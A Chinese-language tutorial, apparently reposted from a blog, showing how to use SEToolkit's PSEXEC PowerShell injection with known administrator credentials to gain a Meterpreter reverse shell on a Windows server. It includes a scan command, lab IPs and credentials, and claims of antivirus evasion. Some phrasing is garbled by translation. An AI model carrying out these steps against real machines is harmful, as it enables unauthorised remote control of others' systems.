在SET Toolkit中使用PSEXEC Injection攻击远程PC

目标:窗口服务器
攻击者机器:kali Linux
在本文中,我将通过SEToolkit进行powershell注入攻击; 对于此攻击,必须运行SMB服务,并且您应该知道目标PC的用户名和密码才能获得Meterpreter会话。
让我们开始游戏吧!
通过在kali Linux中的终端上键入以下命令,从NMAP扫描受害者IP
Nmap -sV 192.168.1.104
在版本扫描下,它显示端口445打开的,如果您不知道端口协议服务,那么让我告诉您端口445用于SMB协议,以便在两个不同的操作系统之间进行通信,就像我们有Linux和Windows一样。

现在单击  Applications  >  Exploitation Tools  >  Social Engineering Toolkit  >  setoolkit
一个新的终端对setoolkit框架开放,现在你必须按照这些步骤对目标进行攻击。
从屏幕截图中,您可以通过菜单感知它,以便选择以下攻击方法。
为此方法选择渗透测试(快速跟踪)和类型2

Fast-Track是针对渗透测试人员的自动渗透套件。所以从下一个屏幕截图中我们有以下选项,选择PSEXEC Powershell Injection并输入6
PSEXEC Powershell注入攻击:此攻击将通过powershell内存注入注入一个计时器后门。这将避免反病毒,因为我们永远不会触摸磁盘或内存。将要求Powershell安装在远程受害者计算机上。您可以使用直接密码或哈希值。

现在提供以下信息以对受害者pc执行攻击。
输入远程IP为rhost:192.168.1.104
输入用户名:administrato r
输入密码:Ignite @ 1234
如果您不知道域名命中仅为此输入,并且随机选择相同的线程数命中输入。
输入侦听器IP为lhost :192.168.1.3
输入端口号:445
现在,这将为powershell注入生成一个有效负载,并开始加载metasploit框架本身。从下面的图像中你会发现通过字母shellcode我们已经打开了meterpreter session1。
现在键入会话以查看活动会话
进一步输入类型会话-I 1以进入内部仪表模式。
Meterpreter> sysinfo
{注意:此攻击取决于SMB PROTOCOL的版本; 如果版本更新为2.1则可能是此攻击不成功。使用积极的扫描方法来获取版本细节。}
转载请注明本文链接: http://www.mayidui.net/t2268.html
游客
登录后才可以回帖,登录 或者 注册